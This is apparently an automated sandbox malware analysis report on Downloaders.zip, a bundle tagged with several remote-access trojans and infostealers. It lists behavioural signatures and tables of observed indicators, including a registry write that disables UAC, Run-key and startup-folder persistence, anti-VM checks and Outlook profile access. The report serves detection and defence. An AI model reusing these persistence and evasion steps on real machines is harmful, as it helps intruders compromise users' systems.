Malware Analysis Report

2025-03-15 08:28

Sample ID 250213-e1kk6atmaz
Target Downloaders.zip
SHA256 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
Tags
asyncrat gurcu njrat quasar redline systembc xworm beyond default hacked by here newoffice office04 tg@cvv88888 adware bootkit microsoft collection defense_evasion discovery execution infostealer persistence phishing privilege_escalation ransomware rat spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

Threat Level: Known bad

The file Downloaders.zip was found to be: Known bad.

Malicious Activity Summary

asyncrat gurcu njrat quasar redline systembc xworm beyond default hacked by here newoffice office04 tg@cvv88888 adware bootkit microsoft collection defense_evasion discovery execution infostealer persistence phishing privilege_escalation ransomware rat spyware stealer trojan upx

Detect Xworm Payload

Gurcu, WhiteSnake

Xworm

Quasar payload

Quasar family

RedLine

njRAT/Bladabindi

RedLine payload

AsyncRat

Njrat family

Suspicious use of NtCreateUserProcessOtherParentProcess

SystemBC

Asyncrat family

Gurcu family

Suspicious use of NtCreateProcessExOtherParentProcess

Systembc family

Quasar RAT

UAC bypass

Xworm family

Redline family

Async RAT payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Sets service image path in registry

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Boot or Logon Autostart Execution: Active Setup

Disables Task Manager via registry modification

Modifies Windows Firewall

Drops file in Drivers directory

Reads user/profile data of local email clients

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

Identifies Wine through registry keys

Executes dropped EXE

Indicator Removal: Clear Windows Event Logs

Reads WinSCP keys stored on the system

Checks BIOS information in registry

Event Triggered Execution: Component Object Model Hijacking

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Writes to the Master Boot Record (MBR)

Checks installed software on the system

Adds Run key to start application

Enumerates connected drives

Installs/modifies Browser Helper Object

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

UPX packed file

Enumerates processes with tasklist

Drops autorun.inf file

Suspicious use of SetThreadContext

Detected potential entity reuse from brand MICROSOFT.

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Sets desktop wallpaper using registry

Drops file in Windows directory

Drops file in Program Files directory

System Network Configuration Discovery: Wi-Fi Discovery

Event Triggered Execution: Netsh Helper DLL

Browser Information Discovery

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Program crash

Delays execution with timeout.exe

Suspicious use of UnmapMainImage

Checks processor information in registry

Modifies data under HKEY_USERS

outlook_office_path

Suspicious use of SendNotifyMessage

outlook_win_path

Runs ping.exe

Scheduled Task/Job: Scheduled Task

NTFS ADS

Modifies registry key

Enumerates system info in registry

Modifies registry class

System policy modification

Views/modifies file attributes

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Opens file in notepad (likely ransom note)

Modifies system certificate store

Suspicious behavior: LoadsDriver

Suspicious behavior: MapViewOfSection

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Checks SCSI registry key(s)

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-02-13 04:24

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-13 04:24

Reported

2025-02-13 04:46

Platform

win11-20250211-en

Max time kernel

1152s

Max time network

1306s

Command Line

winlogon.exe

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Xworm Payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Gurcu family

gurcu

Gurcu, WhiteSnake

stealer gurcu

Njrat family

njrat

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

RedLine

infostealer redline

RedLine payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Redline family

redline

Suspicious use of NtCreateProcessExOtherParentProcess

Description | Indicator | Process | Target
PID 4872 created 5332 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Desktop\Files\TPB-1.exe

SystemBC

trojan systembc

Systembc family

systembc

UAC bypass

defense_evasion trojan

Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A

Xworm

trojan rat xworm

Xworm family

xworm

njRAT/Bladabindi

trojan njrat

Async RAT payload

rat

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\Files\random.exe | N/A

Boot or Logon Autostart Execution: Active Setup

persistence

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Version = "43,0,0,0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A
Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A
Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\ = "Microsoft Edge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\StubPath = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Localized Name = "Microsoft Edge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\IsInstalled = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A

Disables Task Manager via registry modification

defense_evasion

Downloads MZ/PE file

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Windows\System32\svchost.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\svc.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Windows\System32\svchost.exe | N/A
N/A | N/A | C:\Windows\System32\svchost.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463.exe | N/A

Drops file in Drivers directory

Description | Indicator | Process | Target
File created | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Program Files\ProcessMonitor\Procmon64.exe | N/A
File opened for modification | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Users\Admin\AppData\Local\Temp\Procmon64.exe | N/A
File created | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Users\Admin\AppData\Local\Temp\Procmon64.exe | N/A
File opened for modification | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Program Files\sysint\Procmon64.exe | N/A
File created | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Program Files\sysint\Procmon64.exe | N/A
File opened for modification | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe | N/A
File created | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe | N/A
File opened for modification | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Program Files\ProcessMonitor\Procmon64.exe | N/A

Modifies Windows Firewall

defense_evasion

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A

Sets service image path in registry

persistence

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCMON24\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCMON24.SYS" | C:\Program Files\ProcessMonitor\Procmon64.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCMON24\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCMON24.SYS" | C:\Users\Admin\AppData\Local\Temp\Procmon64.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCMON24\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCMON24.SYS" | C:\Program Files\sysint\Procmon64.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCMON24\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCMON24.SYS" | C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe | N/A

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\Files\random.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\Files\random.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\Desktop\Files\XClient.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\Desktop\Files\winlog32.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DriverUtil.vbs | C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\Desktop\Files\Fast%20Download.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\Desktop\Files\XClient.exe | N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Procmon64.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\Fast%20Download.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\XClient.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\built.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\key.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\contorax.exe | N/A
N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\Sentil.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\Security.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client1.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\Client-built.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77Security.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\srtware.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\$77Security.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\Pichon.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\TCP.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\c3.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\winlog32.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\TPB-1.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\TPB-1.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\TPB-1.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\MajesticExec.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\$77Security.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\qNVQKFyM.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Files\svc.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\$77Security.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A

Identifies Wine through registry keys

defense_evasion

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Wine | C:\Users\Admin\Desktop\Files\random.exe | N/A

Indicator Removal: Clear Windows Event Logs

defense_evasion

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\svhost = "\"C:\\Users\\Admin\\AppData\\Roaming\\KDOT\\PerfWatson1.exe\"" | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\SystemHandler = "C:\\ProgramData\\Winsrv\\winsvc.exe" | C:\Users\Admin\AppData\Local\Temp\temp_16933.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\adbabbcfdbc = "\"C:\\ProgramData\\adbabbcfdbc.exe\"" | C:\Users\Admin\AppData\Local\Temp\temp_16943.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\adbabbcfdbc = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\temp_16943.exe\"" | C:\Windows\Explorer.EXE | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\Desktop\\Files\\networkmanager.exe" | C:\Users\Admin\Desktop\Files\networkmanager.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Subsystem Framework = "\"C:\\ProgramData\\Microsoft Subsystem Framework\\winmsbt.exe\"" | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\Desktop\\Files\\networkmanager.exe" | C:\Users\Admin\Desktop\Files\networkmanager.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\Desktop\\Files\\networkmanager.exe" | C:\Users\Admin\Desktop\Files\networkmanager.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" | C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77Security = "C:\\Users\\Admin\\AppData\\Roaming\\$77Security.exe" | C:\Users\Admin\AppData\Local\Temp\$77Security.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\adbabbcfdbc = "\"C:\\ProgramData\\adbabbcfdbc.exe\"" | C:\Windows\Explorer.EXE | N/A
